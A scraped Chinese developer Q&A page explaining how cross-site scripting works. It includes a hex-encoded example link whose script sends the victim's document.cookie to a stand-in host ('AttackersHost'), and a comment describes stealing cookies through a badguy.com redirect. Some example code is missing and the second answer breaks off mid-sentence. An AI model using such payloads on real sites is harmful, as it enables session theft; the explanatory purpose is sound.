当前位置:  开发笔记 > 编程语言 > 正文

XSS如何运作?

如何解决《XSS如何运作?》经验,为你挑选了2个好方法。

有人可以解释XSS如何用简单的英语工作吗?也许举个例子.谷歌搜索没有多大帮助.



1> CMS..:

跨站点脚本基本上是动态网页的安全漏洞,攻击者可以创建恶意链接以将不需要的可执行JavaScript注入网站.在没有过滤或检查其内容的情况下打印或回显GET变量时,会出现此漏洞的最常见情况.

当受害者点击链接时,恶意代码可以将受害者的cookie发送到另一台服务器,或者它可以修改受影响的站点,注入表单,窃取用户名和密码以及其他网络钓鱼技术.

恶意链接示例:

http://VulnerableHost/a.php?variable=

编码恶意代码也很常见,例如以十六进制编码:

http://VulnerableHost/a.php?variable=%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%41%74%74%61%63%6B%65%72%73%48%6F%73%74%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%2E%63%67%69%3F%20%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E


这是过滤的好事!:P
@CraigJacobs,攻击者将创建超链接,并将其发送给"受害者".受害者点击它,代码在他们的浏览器上执行.现在,诀窍是javascript的作用.它可以从页面中删除数据,或者获取用户的cookie,然后将其发送到其他地方.例如,它可能需要用户的cookie,并将用户重定向到www.badguy.com?cookies=cookiesHere2343rwerw.现在,badguy.com可以进入受害者的会话并做坏事.

2> Mike Samuel..:

只要应用程序外部的字符串可以解释为代码,就会存在XSS漏洞.

例如,如果您通过执行以下操作生成HTML:


  

然后,如果$myQueryParameter变量包含

无名有名我无名_593
这个屌丝很懒,什么也没留下!
DevBox开发工具箱 | 专业的在线开发工具网站    京公网安备 11010802040832号  |  京ICP备19059560号-6
Copyright © 1998 - 2020 DevBox.CN. All Rights Reserved devBox.cn 开发工具箱 版权所有